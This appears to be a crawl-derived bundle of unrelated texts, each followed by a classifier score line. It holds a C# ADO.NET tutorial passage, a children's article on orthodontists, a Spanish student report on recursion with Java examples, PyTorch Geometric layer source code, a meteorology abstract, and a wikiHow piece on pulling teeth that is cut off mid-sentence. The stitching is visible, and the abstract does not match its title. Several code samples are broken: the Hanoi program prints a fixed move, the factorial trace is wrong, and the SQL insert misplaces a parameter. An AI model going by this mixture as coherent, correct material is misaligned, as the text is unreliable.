dbo.Students VALUES (@studentID, @studentName, @studentID) SELECT @result ResultCode END Add the AddStudent method into the Program.cs file as follow. // Add student using the execute scalar in order to get the result code public static int AddStudent(int id, string name, int age) { int resultCode; using (SqlConnection con = new SqlConnection(sqlConnectionString)) { SqlCommand cmd = new SqlCommand("AddStudent", con); cmd.CommandType = CommandType.StoredProcedure; cmd.Parameters.Add("@studentID", DbType.Int32).Value = id; cmd.Parameters.Add("@studentName", DbType.String).Value = name; cmd.Parameters.Add("@studentAge", DbType.Int32).Value = age; try { con.Open(); resultCode = (int)cmd.ExecuteScalar(); con.Close(); } catch (Exception) { return -10; // unknown error } } return resultCode; } In the main method.. // ExecuteScalar int resultCode = AddStudent(1, "Chris", 28); // Should get -1 (already record with this ID) int resultCode2 = AddStudent(5, "Smith", 130); // Should get -2 (Invalid age number) int resultCode3 = AddStudent(5, "Jason", 21); // Should get 0 (Success) ExecuteNonQuery This function is a very good choice when you want to know how many rows your query has affected. You can use it while inserting, updating or deleting records. For this example let’s create a stored procedure to update a student’s name based on it’s StudentID. CREATE PROCEDURE [dbo].[UpdateStudentsName] @studentID int, @studentNewName nvarchar(50) AS BEGIN UPDATE dbo.Students SET StudentName = @studentNewName WHERE StudentID = @studentID END In Program.cs add the UpdateStudent method and call it in the main method. public static int UpdateStudent(int id, string newName) { int rowsAffected; using (SqlConnection con = new SqlConnection(sqlConnectionString)) { SqlCommand cmd = new SqlCommand("UpdateStudentsName", con); cmd.CommandType = CommandType.StoredProcedure; cmd.Parameters.Add("@studentID", DbType.Int32).Value = id; cmd.Parameters.Add("@studentNewName", DbType.String).Value = newName; try { con.Open(); rowsAffected = cmd.ExecuteNonQuery(); con.Close(); } catch (Exception) { return 0; // unknown error } } return rowsAffected; } // ExecuteNonQuery int row1 = UpdateStudent(1, "Chris Sak."); // Should return 1 // Row found and updated int row2 = UpdateStudent(30, "Helen K."); // Should return 0 // Row not found Batch Queries using SqlTransaction To be honest, most of the times you will want to execute more complex queries than the above but you got the main idea. One of the best practices when you want to execute multiple (batch) queries against your database, is to encapsulated them in a single transaction. Let’s see how easy is to handle the results of each of the query and rollback the transaction in case you have unexpected results. In the following method we try to add 4 Students in the table but the 4th insert should fail and cause the transaction to rollback. // Use SqlCommands in a Transaction public static bool ExecuteBatchQueries(string conStr) { bool transactionExecuted = false; List<Student> studentList = new List<Student>(); Student s1 = new Student { ID = 10, Name = "John", Age = 34 }; Student s2 = new Student { ID = 11, Name = "Helen", Age = 23 }; Student s3 = new Student { ID = 12, Name = "Mary", Age = 54 }; Student s4 = new Student { ID = 10, Name = "Christiano", Age = 31 }; studentList.Add(s1); studentList.Add(s2); studentList.Add(s3); studentList.Add(s4); using (var con = new SqlConnection(conStr)) { SqlTransaction trans = null; try { con.Open(); trans = con.BeginTransaction(); foreach (Student student in studentList) { SqlCommand cmd = new SqlCommand("AddStudent", con,trans); cmd.CommandType = CommandType.StoredProcedure; cmd.Parameters.Add("@studentID", DbType.Int32).Value = student.ID; cmd.Parameters.Add("@studentName", DbType.String).Value = student.Name; cmd.Parameters.Add("@studentAge", DbType.Int32).Value = student.Age; int resultCode = (int)cmd.ExecuteScalar(); if (resultCode != 0) { trans.Rollback(); return transactionExecuted; // false } } trans.Commit(); transactionExecuted = true; con.Close(); } catch (Exception Ex) { if (trans != null) trans.Rollback(); return false; } return transactionExecuted; } } public class Student { public int ID { get; set; } public string Name { get; set; } public int Age { get; set; } } In the main: // Compininations in SqlTransaction : Very helpfull!! if(ExecuteBatchQueries(sqlConnectionString)) { Console.WriteLine("Transaction completed"); } else { Console.WriteLine("Transaction failed to complete"); } That’s it, we saw when and how to use the different functions the SqlCommand class offers. I hope you have enjoyed the post. Download the project we created and the database as well from here. Advertisements Categories: ADO.NET Tags: , , , , 2 replies 1. I’m not that much of a internet reader to be honest but your sites really nice, keep it up! I’ll go ahead and bookmark your website to come back later. Many thanks Leave a Reply Fill in your details below or click an icon to log in: WordPress.com Logo You are commenting using your WordPress.com account. Log Out / Change ) Twitter picture You are commenting using your Twitter account. Log Out / Change ) Facebook photo You are commenting using your Facebook account. Log Out / Change ) Google+ photo You are commenting using your Google+ account. Log Out / Change ) Connecting to %s mohitgoyal.co Automating infrastructure one line at a time Diary Of A Programmer Because every day is worth noting Chara Plessa The purpose of this blog is to broaden my education, promote experimentation and enhance my professional development. Albert Einstein once said that “If you can’t explain it simply, you don’t understand it well enough” and I strongly believe him! chsakell's Blog WEB APPLICATION DEVELOPMENT BEST PRACTICES WITH MICROSOFT STACK & ANGULAR Kumikoro A Front End Developer's Blog Muhammad Hassan Full Stack Developer | ASP.NET | MVC | WebAPI | Advanced Javascript | AngularJS | Angular2 | C# | ES6 | SQL | TypeScript | HTML5 | NodeJS, MS candidate @LUMS, Grad & EX-Adjunct Faculty @NUCES-FAST, seasonal blogger & open-source contributor. Seattle, WA. Software Engineering Web development IEvangelist .NET, ASP.NET, C#, MVC, TypeScript, AngularJS leastprivilege.com Dominick Baier on Identity & Access Control Happy DotNetting In Love with Technology Knoldus Knols of experience to your advantage knowshnet Search - Read - Request - Share Rahul's space Learn, Share and Grow with me ! Dhananjay Kumar Developer Evangelist @Infragistics | MVP @Microsoft SQL Authority with Pinal Dave SQL Server Performance Tuning Expert Conficient Blog Random bits of tech from @conficient Code! Code! Code! SOLID & KISS Code Wala Designing and coding Microsoft Mentalist A way to start with Microsoft Technologies %d bloggers like this:
__label__pos
0.943315
Every other week, Lamar's brother Calvin goes to the orthodontist after school to have his braces checked. One day the dentist told Lamar's mom that Lamar should see an orthodontist, too. What's an orthodontist? Why does Lamar need to see one? And what will happen at the appointment? What's an Orthodontist? Just like baseball and gymnastics are types of sports, an orthodontist (say: or-thoh-DONtist) is a type of dentist. Using braces, retainers, and other devices, an orthodontist helps straighten a person's teeth and correct the way the jaws line up. Straight teeth and aligned jaws create nice smiles and help keep your teeth healthy. On top of that, when your jaws and teeth are well aligned, it's easier to chew food. Orthodontic care can even help prevent snoring! So why would you go to the orthodontist? Your dentist or one of your parents might recommend it because they see a problem with your teeth or jaws. Or a kid who doesn't like the way his or her teeth look might ask to see an orthodontist. Orthodontists treat kids for many problems, including having crowded or overlapping teeth or having problems with jaw growth and tooth development. These tooth and jaw problems may be caused by tooth decay, losing baby teeth too soon, accidents, or habits like thumb sucking. These problems also can be genetic or inherited, meaning that they run in a person's family. When Should a Kid Go to the Orthodontist? There's no set age for a kid to visit the orthodontist — some kids go when they're 6, some kids go when they're 10, and some go while they're teens. Even adults visit the orthodontist for treatment. Many orthodontists say a kid should see an orthodontist before age 7 so any problems can be spotted early. That doesn't mean a kid will get braces right away. But the orthodontist will know which problems exist and can choose the best time to start treatment. What Happens at the Orthodontist? When you make your first trip to the orthodontist, you'll visit an office that looks a lot like your dentist's office. You'll sit in a dentist chair and the orthodontic technician or assistant might take X-rays or computer pictures of your mouth and teeth. The X-rays and pictures show the orthodontist where the teeth are positioned and whether you have teeth that haven't come in yet. The technician or orthodontist also may make a mold (or impression) of your teeth by pressing a tray of gooey material into your top and bottom teeth. When the mold is removed, there will be a perfect impression of the shape and size of your teeth. A mold helps the orthodontist decide how to straighten your teeth. The orthodontist will examine your teeth, mouth, and jaws. He or she may ask you to open wide or bite your teeth together and might ask questions about whether you have problems chewing or swallowing or whether your jaws ever click or pop when you open your mouth. The orthodontist may tell you and your parent that your teeth and jaws are fine, or recommend that you begin treatment. What Do Braces Do? Braces correct how your teeth line up by putting steady pressure on the teeth, which eventually moves them into a straighter position. A retainer also applies pressure to your teeth, and it may be used to hold your teeth in a straight position after wearing braces. Sometimes the orthodontist may recommend that you have one or more teeth removed to create more space in your mouth. If you need to have teeth removed, the dentist or oral surgeon will give you medicine to keep you comfortable during the procedure. Once your braces are on, you'll visit the orthodontist every few weeks. It's important to remember that you still need to get regular dental checkups during this time to have your teeth cleaned and checked for cavities. On some visits, the orthodontist may simply check to make sure that your braces are in place as they should be. At other visits, the orthodontist may adjust wires on the braces to move the teeth into position. The orthodontist may show you how to wear rubber bands, which are stretched between two teeth and help to correct the way your teeth line up. Some kids also may need to wear other devices, such as headgear. You may have seen kids who have headgear, which gets its name from the fact that it's worn around the head. Headgear uses a horseshoe-shaped wire, which attaches to back teeth. It's designed to apply pressure that pushes the back teeth back, allowing more room for teeth in the front of the mouth. Headgear is usually just worn at night, not during the day. You can expect to feel a little uncomfortable sometimes when you wear braces or other orthodontic devices. Your mom or dad can give you a pain reliever if it hurts. And the orthodontist usually provides wax you can use to cover any sharp spots on the braces that are bothering you or are rubbing against the inside of your mouth or gums. How Long Will I Have to Go to the Orthodontist? Braces can be worn for different lengths of time, but most people wear them for 1 to 3 years. After the braces are removed, many kids need to wear a retainer for a while to keep their teeth in place. During this time, you'll still need to visit the orthodontist regularly. Every kid wears a retainer for a different length of time. But the good news is, by the time you're wearing a retainer, you'll be smiling a super smile! Back to Articles Related Articles Movie: Teeth Chloe and the Nurb sing about teeth and all they do for you - talking and eating, just to name a few! Read More Word! Braces If your teeth aren't straight, you can go to an orthodontist (a special kind of dentist) to get braces. Read More Going to the Dentist What happens when you go to the dentist? Find out in this article for kids. Read More The Reality of Retainers Retainers are really common. In fact, most kids have to wear a retainer for at least a little while after getting their braces taken off. Find out more. Read More Taking Care of Your Teeth The healthier your teeth are, the happier you look. That's why it's important to take great care of your teeth by brushing, flossing, and visiting the dentist. Learn more. Read More Braces Braces are a fact of life for many kids. Find out how they work and how to take care of them. Read More What's a Cavity? Cavities are small holes in your teeth that need to be filled. Find out what causes tooth decay and how dentists handle it. Read More Note: All information is for educational purposes only. For specific medical advice, diagnoses, and treatment, consult your doctor. © 1995-2021 KidsHealth®. All rights reserved. Images provided by The Nemours Foundation, iStock, Getty Images, Veer, Shutterstock, and Clipart.com. Search our entire site.
__label__pos
0.687687
Está en la página 1de 16 Instituto Tecnolgico Superior de Coatzacoalcos Ingeniera en Sistemas Computacionales Nombre del Alumno: Contreras Rodrguez Apellido Paterno Apellido Materno Octavio Nombre(s) PORTAFOLIO DE EVIDENCIAS Estructura de datos No. Control: CALCULO DIFERENCIAL 14082078 Nombre del Docente: Blanquet Apellido Paterno Semestre: Escobar Landy Apellido Materno Nombre(s) Grupo: INDICE Introduccin..................................................................................................... 3 OBJETIVO GENERAL DE CURSO:.........................................................................4 Temario:............................................................................................................... 5 Unidad 2 Recursividad.......................................................................................... 8 2.1 Definicin....................................................................................................... 8 2.2 Procedimientos recursivos.............................................................................. 9 2.3 Ejemplos de casos recursivos.......................................................................14 Conclusin...................................................................................................... 15 Bibliografa........................................................................................................ 16 Introduccin La recursividad es una tcnica muy utilizada en programacin. Se suele utilizar para resolver problemas cuya solucin se puede hallar resolviendo el mismo problema, pero para un caso de tamao menor. Los mtodos recursivos se pueden usar en cualquier situacin en la que la solucin pueda ser expresada como una sucesin de pasos o transformaciones gobernadas por un conjunto de reglas claramente definidas. En un algoritmo recursivo podemos distinguir dos partes: Base o problema trivial que se puede resolver sin clculo Recursin: Frmula da la solucin del problema en funcin define de un problema del mismo tipo ms sencillo OBJETIVO GENERAL DE CURSO: Identificar, seleccionar y aplicar eficientemente tipos de datos abstractos, mtodos de ordenamiento y bsqueda para la optimizacin del rendimiento de soluciones de problemas del mundo real. Temario: UNIDAD 1 Introduccin a las estructuras de datos. 1.1 1.2 1.3 1.4 1.5 Tipos de datos abstractos (TDA). Modularidad. Uso de TDA. Manejo de memoria esttica. Manejo de memoria dinmica UNIDAD 2 Recursividad 2.1 Definicin 2.2 Procedimientos recursivos 2.3 Ejemplos de casos recursivos UNIDAD 3 Estructuras lineales 3.1Listas 3.1.1Operaciones bsicas con listas. 3.1.2Tipos de listas. 3.13Listas simplemente enlazadas. 3.1.4Listas doblemente enlazadas. 3.1.5Listas circulares. 3.1.6Aplicaciones. 3.2Pilas. 3.2.1Representacin en memoria esttica y dinmica. 3.2.2Operaciones bsicas con pilas. 3.2.3Aplicaciones. 3.2.4Notacin infija y postfija. 3.2.5Recursividad con ayuda de pilas. 3.3Colas. 3.3.1Representacin en memoria esttica y dinmica. 3.3.2Operaciones bsicas con colas. 3.3.3Tipos de colas: Cola simple, Cola circular y Colas dobles. Hernndez 3.3.4Aplicaciones: Colas de prioridad. UNIDAD 4 Estructuras no lineales 4.1 Arboles. 4.1.1 Concepto de rbol. 4.1.2 Clasificacin de rboles. 4.1.3 Operaciones bsicas sobre rboles binarios. 4.1.4 Aplicaciones. 4.1.5 Arboles balanceados (AVL). 4.2 Grafos. 4.2.1 Terminologa de grafos. 4.2.2 Operaciones bsicas sobre grafos. UNIDAD 5 Mtodos de ordenamiento 5.1 Algoritmos de Ordenamiento Internos 5.1.1 Burbuja. 5.1.2 Quicksort. 5.1.3 ShellSort. 5.1.4 Radix 5.2 Algoritmos de ordenamiento Externos 5.2.1 Intercalacin 5.2.2 Mezcla Directa 5.2.3 Mezcla Natural UNIDAD 6 Mtodos de bsqueda 6.1 Bsqueda secuencial 6.2 Bsqueda binaria 6.3 Bsqueda por funciones de HASH UNIDAD 7 Anlisis de los algoritmos 7.1 Complejidad en el tiempo. 7.2 Complejidad en el espacio. 7.3 Eficiencia de los algoritmos. Unida d2 Recur sivida d Unidad 2 Recursividad 2.1 Definicin Recursin es una tcnica de programacin en el cual un mtodo puede llamarse a s mismo. La recursin es muy interesante y una tcnica efectiva en programacin ya que puede producir algoritmos cortos y eficientes. Algo es recursivo si se define en trminos de s mismo (cuando para definirse hace mencin a s mismo). Si la invocacin de un subprograma (funcin o subrutina) se produce desde el propio subprograma se dice que se trata de un subprograma recursivo. Un mtodo recursivo es un mtodo, directa o indirectamente, se hace una llamada a s mismo. La recursin consiste en el uso de mtodos recursivos. Se puede usar en toda situacin, en la cual la solucin puede ser expresada como una secuencia de movimientos. 1.1 Un ejemplo de la recursividad La funcin recursiva se compone de - Caso base: Una solucin simple para caso particular (puede haber ms de un caso base). Es una instancia que se puede resolver sin recursin. - Caso recursivo: Una solucin que involucra a utilizar la misma funcin original, con parmetros que se acercan ms al caso base. Los pasos que sigue el caso recursivo son: - El procedimiento se llama a s mismo. - El problema se resuelve tratando el mismo problema pero de tamao menor. - La manera en la cual el tamao del problema disminuye asegura que el caso base eventualmente se alcanzara. 2.2 Procedimientos recursivos Un Procedimiento recursivo es aquel que se llama as mismo, solo que no regresa valor. Cada mtodo (funcin o procedimiento), tiene ciertas reglas, las cuales se mencionan a continuacin: La Funcin Recursiva Debe tener ciertos argumentos llamados valores base para que esta ya no se refiera a s misma. El Procedimiento Recursivo es donde Cada vez que la funcin se refiera a s misma debe estar ms cerca de los valores base. Propiedades de procedimientos recursivos Debe existir criterio base para que este se llame a s mismo. Cada vez que el procedimiento se llame a si mismo debe estar ms cerca del criterio base. El Mtodo De Las Tres Preguntas Se usa para verificar si hay dentro de un programa funciones recursivas, se debe responder a 3 preguntas. La pregunta caso base: Hay salida NO recursiva del procedimiento o funcin y la rutina funciona correctamente para este caso base? La pregunta llamador ms pequeo Cada llamada al procedimiento o funcin se refiere a un caso ms pequeo del problema original? La pregunta caso general Suponiendo que las llamadas recursivas funcionan correctamente funciona correctamente todo el procedimiento o funcin? Escritura de procedimiento y funciones recursivas (pasos a seguir para hacer programas recursivos). Recursividad Se puede utilizar el siguiente mtodo para escribir cualquier rutina recursiva. Primero obtener una funcin exacta del problema a resolver. A continuacin, determinar el tamao del problema completo que hay que resolver, este tamao determina los valores de los parmetros en la llamada inicial al procedimiento o funcin. Resolver el caso base en el que el problema puede expresarse no recursivamente, esto asegura una respuesta afirmativa a la pregunta base. Por ltimo, resolver el caso general correctamente en trminos de un caso ms pequeo del mismo problema, es decir una respuesta afirmativa a las preguntas 2 y 3 del mtodo de las 3 preguntas. Un ejemplo de caso recursivo es la sucesin de Fibonacci Es la siguiente sucesin infinita de nmeros naturales: Esta sucesin la podemos representar de esta manera en java, aplicando la recursividad 1.2 Ejemplo de Fibonacci en caso recursivo (cdigo en java). Una vez ejecutado nos quedara de esta manera el cdigo, en este programa necesitamos el Fibonacci de un nmero ingresado desde la lnea de cdigo. 1.3 Fibonacci en java ejecutado A continuacin presentamos el cdigo: package fibonaccirecursivo; public class FibonacciRecursivo { public static void main(String[] args) { long num=5; System.out.println("Serie Fibonacci"); System.out.println("El Fibonacci es "+fibo(num)); } public static long fibo (long num){ if (num==0 || num==1){ return num; } else{ return fibo(num-1)+fibo(num-2); } } } Otro ejemplo el de las torres de Hani El de torres de Hani primero presentamos el algoritmo de cmo funciona la sucesin Entrada: Tres pilas de nmeros origen, auxiliar, destino, con la pila origen ordenada Salida: La pila destino 1. si origen entonces 1. mover el disco 1 de pila origen a la pila destino (insertarlo arriba de la pila destino) 2. terminar 2. si no 1. hanoi( ,origen,destino, auxiliar) //mover todas las fichas menos la ms grande (n) a la varilla auxiliar 3. mover disco n a destino 4. hanoi (auxiliar, origen, destino) //mover la ficha grande hasta la varilla final //mover todas las fichas restantes, 1...n1, encima de la ficha grande (n) 5. terminar Ahora en java 1.4 Programa en java de torres de Hani Una vez escrito el programa procedemos a la ejecucin 1.5 Ejecucin de las torres de Hani en java El cdigo del programa package hanoi; import java.util.*; public class Hanoi { public void Hanoi(int num, int inicio,int temp, int fin) { if(num == 1) { System.out.print("Moviendo de la torre 1,ala torre 3"); } else { Hanoi(num-1, inicio, fin,temp); System.out.println("Moviendose de la torre de inicio"+inicio+"ala torre final"+fin); Hanoi(num-1, temp,inicio,fin); } } } Programa principal package hanoi; import java.util.Scanner; public class Principal extends Hanoi{ public static void main(String[] args) { int n=0; Scanner leer = new Scanner(System.in); Hanoi h = new Hanoi(); System.out.println("Ingrese el numero de aros"); n = leer.nextInt(); h.Hanoi(n, 1,2,3); } } 2.3 Ejemplos de casos recursivos Ejemplo: Factorial Escribe un programa que calcule el factorial (!) de un entero no negativo. 1!= 1 2!= 2 2+1 3!= 6 3*2*1 4!= 24 4*3*2*1 5!= 120 5*4*3*2*1 Solucion recursiva Aqu podemos ver la secuencia que toma el factorial. N! si N = 0 (base) (N-1) !* N>0 (recursin) Un razonamiento recursivo tiene dos partes: la base y la regla recursiva de la construccin. La base no recursiva y es el punto tanto de partida como de determinacin de la definicin. Cmo funciona la recursividad? Si (n>0) Entonces ------- f(n)=1; Else Si(n>0) Entonces--------- N*f(n-1); F(4)= = 24 F(4)= 4*6 F(3)= 3*2 F(2)= 2*1 F(1)= 1+1 1 Conclusin En esta unidad aprendimos detalladamente que es la recursividad y su aplicacin en un programa de java para poder ejecutarlo. Recursin es una tcnica de programacin en el cual un mtodo puede llamarse a s mismo. La recursin es muy interesante y una tcnica efectiva en programacin ya que puede producir algoritmos cortos y eficientes. Bibliografa https://es.wikipedia.org/wiki/Sucesi%C3%B3n_de_Fibonacci https://sites.google.com/site/estdatjiq/home/unidad-ii http://itpn.mx/recursosisc/3semestre/estructuradedatos/Unidad%20II.pdf https://es.wikipedia.org/wiki/Torres_de_Han%C3%B3i http://puntocomnoesunlenguaje.blogspot.mx/2012/04/torres-de-hanoi.html
__label__pos
0.593038
Aircraft-based observations of air-sea fluxes over Denmark Strait and the Irminger sea during high wind speed conditions GN Petersen, IA Renfrew Research output: Contribution to journalArticlepeer-review 10 Citations (Scopus) 10 Downloads (Pure) Abstract The impact of targeted sonde observations on the 1-3 day forecasts for northern Europe is evaluated using the Met Office four-dimensional variational data assimilation scheme and a 24 km gridlength limited-area version of the Unified Model (MetUM). The targeted observations were carried out during February and March 2007 as part of the Greenland Flow Distortion Experiment, using a research aircraft based in Iceland. Sensitive area predictions using either total energy singular vectors or an ensemble transform Kalman filter were used to predict where additional observations should be made to reduce errors in the initial conditions of forecasts for northern Europe. Targeted sonde data was assimilated operationally into the MetUM. Hindcasts show that the impact of the sondes was mixed. Only two out of the five cases showed clear forecast improvement; the maximum forecast improvement seen over the verifying region was approximately 5% of the forecast error 24 hours into the forecast. These two cases are presented in more detail: in the first the improvement propagates into the verification region with a developing polar low; and in the second the improvement is associated with an upper-level trough. The impact of cycling targeted data in the background of the forecast (including the memory of previous targeted observations) is investigated. This is shown to cause a greater forecast impact, but does not necessarily lead to a greater forecast improvement. Finally, the robustness of the results is assessed using a small ensemble of forecasts. Original languageEnglish Pages (from-to)2030-2045 Number of pages16 JournalQuarterly Journal of the Royal Meteorological Society Volume135 Issue number645 DOIs Publication statusPublished - 2009 Cite this
__label__pos
0.911349
Source code for torch_geometric.nn.conv.point_transformer_conv from typing import Callable, Optional, Tuple, Union from torch import Tensor from torch_sparse import SparseTensor, set_diag from torch_geometric.nn.conv import MessagePassing from torch_geometric.nn.dense.linear import Linear from torch_geometric.typing import Adj, OptTensor, PairTensor from torch_geometric.utils import add_self_loops, remove_self_loops, softmax from ..inits import reset [docs]class PointTransformerConv(MessagePassing): r"""The Point Transformer layer from the `"Point Transformer" <https://arxiv.org/abs/2012.09164>`_ paper .. math:: \mathbf{x}^{\prime}_i = \sum_{j \in \mathcal{N}(i) \cup \{ i \}} \alpha_{i,j} \left(\mathbf{W}_3 \mathbf{x}_j + \delta_{ij} \right), where the attention coefficients :math:`\alpha_{i,j}` and positional embedding :math:`\delta_{ij}` are computed as .. math:: \alpha_{i,j}= \textrm{softmax} \left( \gamma_\mathbf{\Theta} (\mathbf{W}_1 \mathbf{x}_i - \mathbf{W}_2 \mathbf{x}_j + \delta_{i,j}) \right) and .. math:: \delta_{i,j}= h_{\mathbf{\Theta}}(\mathbf{p}_i - \mathbf{p}_j), with :math:`\gamma_\mathbf{\Theta}` and :math:`h_\mathbf{\Theta}` denoting neural networks, *i.e.* MLPs, and :math:`\mathbf{P} \in \mathbb{R}^{N \times D}` defines the position of each point. Args: in_channels (int or tuple): Size of each input sample, or :obj:`-1` to derive the size from the first input(s) to the forward method. A tuple corresponds to the sizes of source and target dimensionalities. out_channels (int): Size of each output sample. pos_nn (torch.nn.Module, optional): A neural network :math:`h_\mathbf{\Theta}` which maps relative spatial coordinates :obj:`pos_j - pos_i` of shape :obj:`[-1, 3]` to shape :obj:`[-1, out_channels]`. Will default to a :class:`torch.nn.Linear` transformation if not further specified. (default: :obj:`None`) attn_nn (torch.nn.Module, optional): A neural network :math:`\gamma_\mathbf{\Theta}` which maps transformed node features of shape :obj:`[-1, out_channels]` to shape :obj:`[-1, out_channels]`. (default: :obj:`None`) add_self_loops (bool, optional) : If set to :obj:`False`, will not add self-loops to the input graph. (default: :obj:`True`) **kwargs (optional): Additional arguments of :class:`torch_geometric.nn.conv.MessagePassing`. Shapes: - **input:** node features :math:`(|\mathcal{V}|, F_{in})` or :math:`((|\mathcal{V_s}|, F_{s}), (|\mathcal{V_t}|, F_{t}))` if bipartite, positions :math:`(|\mathcal{V}|, 3)` or :math:`((|\mathcal{V_s}|, 3), (|\mathcal{V_t}|, 3))` if bipartite, edge indices :math:`(2, |\mathcal{E}|)` - **output:** node features :math:`(|\mathcal{V}|, F_{out})` or :math:`(|\mathcal{V}_t|, F_{out})` if bipartite """ def __init__(self, in_channels: Union[int, Tuple[int, int]], out_channels: int, pos_nn: Optional[Callable] = None, attn_nn: Optional[Callable] = None, add_self_loops: bool = True, **kwargs): kwargs.setdefault('aggr', 'mean') super().__init__(**kwargs) self.in_channels = in_channels self.out_channels = out_channels self.add_self_loops = add_self_loops if isinstance(in_channels, int): in_channels = (in_channels, in_channels) self.pos_nn = pos_nn if self.pos_nn is None: self.pos_nn = Linear(3, out_channels) self.attn_nn = attn_nn self.lin = Linear(in_channels[0], out_channels, bias=False) self.lin_src = Linear(in_channels[0], out_channels, bias=False) self.lin_dst = Linear(in_channels[1], out_channels, bias=False) self.reset_parameters() [docs] def reset_parameters(self): reset(self.pos_nn) if self.attn_nn is not None: reset(self.attn_nn) self.lin.reset_parameters() self.lin_src.reset_parameters() self.lin_dst.reset_parameters() [docs] def forward( self, x: Union[Tensor, PairTensor], pos: Union[Tensor, PairTensor], edge_index: Adj, ) -> Tensor: """""" if isinstance(x, Tensor): alpha = (self.lin_src(x), self.lin_dst(x)) x: PairTensor = (self.lin(x), x) else: alpha = (self.lin_src(x[0]), self.lin_dst(x[1])) x = (self.lin(x[0]), x[1]) if isinstance(pos, Tensor): pos: PairTensor = (pos, pos) if self.add_self_loops: if isinstance(edge_index, Tensor): edge_index, _ = remove_self_loops(edge_index) edge_index, _ = add_self_loops( edge_index, num_nodes=min(pos[0].size(0), pos[1].size(0))) elif isinstance(edge_index, SparseTensor): edge_index = set_diag(edge_index) # propagate_type: (x: PairTensor, pos: PairTensor, alpha: PairTensor) out = self.propagate(edge_index, x=x, pos=pos, alpha=alpha, size=None) return out def message(self, x_j: Tensor, pos_i: Tensor, pos_j: Tensor, alpha_i: Tensor, alpha_j: Tensor, index: Tensor, ptr: OptTensor, size_i: Optional[int]) -> Tensor: delta = self.pos_nn(pos_i - pos_j) alpha = alpha_i - alpha_j + delta if self.attn_nn is not None: alpha = self.attn_nn(alpha) alpha = softmax(alpha, index, ptr, size_i) return alpha * (x_j + delta) def __repr__(self) -> str: return (f'{self.__class__.__name__}({self.in_channels}, ' f'{self.out_channels})')
__label__pos
0.999942
Edit Article Removing Teeth in ChildrenRemoving Teeth in AdultsMedically Unqualified Home Remedies Edited by Andy Zhang, Versageek, Alexander M, Flickety and 76 others Pulling teeth, called tooth extraction by dental professionals, is not something that can be done without dental training. In most cases, it's advisable to leave the tooth alone until it falls out itself, or schedule an appointment with a dentist. In almost all cases, a dentist with a properly-trained team and special dental equipment will be better suited to remove a problem tooth than the individual at home. Ad Method 1 of 3: Removing Teeth in Children 1. Pull Out a Tooth Step 1.jpg 1 Let nature take its course. Most doctors and dentists recommend that parents not try to do anything to speed up the natural process.[1][2] Teeth that are extracted too early provide less of a guide to the teeth that grow in its place.[3] Any child will tell you that this, too, is an unnecessarily painful option. Ad 2. Pull Out a Tooth Step 2.jpg 2 Monitor the tooth as it gets looser. Make sure that the tooth and the surrounding gum area looks healthy and is free of decay and infection. If the tooth becomes decayed, it may need to be surgically removed in a dental office. 3. Pull Out a Tooth Step 3.jpg 3 If anything, advise your child to wiggle the tooth, but only with the tongue. Not all parents choose to give their child permission to wiggle the tooth, but those who do might want to instruct their child to wiggle only with the tongue. This is for two reasons: • Wiggling with the hands can introduce bacteria and dirt into the mouth, clearing the way for infection. Children aren't exactly the cleanest creatures in the world, making this a recipe for poor dental health in addition to bad hygiene. • The tongue is generally gentler than the hand. Children run a higher risk of accidentally pulling a tooth out before it's ready when they use their fingers to pull out the tooth. Wiggling the tooth with their tongues lowers the risk because the tongue can't grip onto the tooth in the same way that two fingers can. 4. Pull Out a Tooth Step 4.jpg 4 If the new tooth grows in an unexpected location, see a dentist. Permanent teeth coming in behind baby teeth, sometimes known as "sharking" because of the two sets of teeth, is a reversible and common condition. As long as the dentist removes the baby tooth and gives it enough room to move into its intended position in the mouth, it shouldn't be an issue. 5. Pull Out a Tooth Step 5.jpg 5 If the child lets the tooth come out on its own, expect to see very little blood. Children who have waited the proper amount of time for their old tooth to fall out (sometimes as much as 2 to 3 months), there should be very little blood. • If any wiggling or pulling of teeth causes excessive amounts of blood, instruct the child to stop wiggling; the tooth is most likely not yet ready to be extracted, and shouldn't be aggravated further. 6. Pull Out a Tooth Step 6.jpg 6 If the tooth is still loose but not extracted after 2 to 3 months, see a dentist. A dentist will be able to administer a topical pain killer and extract the tooth with the appropriate instruments. 7. Pull Out a Tooth Step 7.jpg 7 When the tooth comes out on its own, hold a piece of gauze over the extraction site. Tell the child to bite down lightly on the gauze. A new blood clot should start forming in the extraction site. • If the socket has lost its clot, an infection could occur. This condition is called dry socket (alveolar osteitis), and is often accompanied by a foul-smelling odor.[4] Contact your dentist if you believe the clot hasn't set appropriately. Method 2 of 3: Removing Teeth in Adults 1. 1 Try to figure out why your tooth needs pulling. Adult teeth are meant to last you lifetime if you take care of them. But if you do need to remove a tooth, it could be for a variety of reasons: • Crowded mouth. Your existing teeth haven't left enough room for your tooth that's trying to move into its proper place. A dentist may be forced to remove the tooth if this is the case. Pull Out a Tooth Step 8Bullet1.jpg • Tooth decay or infection. If infection of the tooth extends all the way down to the pulp, a dentist may need to administer antibiotics or even try a root canal. If a root canal does not fix the problem, a dentist may need to extract the tooth. Pull Out a Tooth Step 8Bullet2.jpg • Compromised immune system. If you are undergoing an organ transplant or chemotherapy, even the threat of infection might motivate a doctor to extract a tooth.[5] Pull Out a Tooth Step 8Bullet3.jpg • Periodontal disease. This disease is caused an infection of the tissues and bones that surround and support the teeth. If periodontal disease has infiltrated the tooth, a dentist may need to take it out. Pull Out a Tooth Step 8Bullet4.jpg 2. Pull Out a Tooth Step 9.jpg 2 Schedule an appointment with your doctor. Do not try to extract the tooth on your own. It's far safer to let a professional dentist extract the tooth than try to be macho and do it on your own. In addition to being safer, it will also be much less painful. 3. Pull Out a Tooth Step 10.jpg 3 Allow the dentist to give you local anesthetic to numb the area of the tooth. 4. Pull Out a Tooth Step 11.jpg 4 Allow the dentist to extract the tooth. The dentist may need to remove part of the gum in order to get at the tooth. In severe cases, the dentist may also need to remove the tooth itself in pieces.[5] 5. Pull Out a Tooth Step 12.jpg 5 Allow a blod clot to form over the extraction site. A blod clot is a sign that your tooth and surrounding gum areas are healing. Hold a piece of gauze over the extraction site and bite down lightly on the gauze. A new blood clot should start forming in the extraction site. • If the socket has lost its clot, an infection could occur. This condition is called dry socket (alveolar osteitis), and is often accompanied by a foul-smelling odor.[4] Contact your dentist if you believe the clot hasn't set appropriately. • If you want to reduce the swelling, place an icepack on the outside of the jaw near to where the tooth was removed. This should reduce the swelling and numb the pain. 6. 6 In the days following the extraction, take care to let your clot heal. In order to do this, try to: • Avoid spitting or rinsing forcefully. Try to avoid drinking from a straw with the first 24 hours. Pull Out a Tooth Step 13Bullet1.jpg • After 24 hours, gargle lightly with a saltwater solution made of 1/2 teaspoon 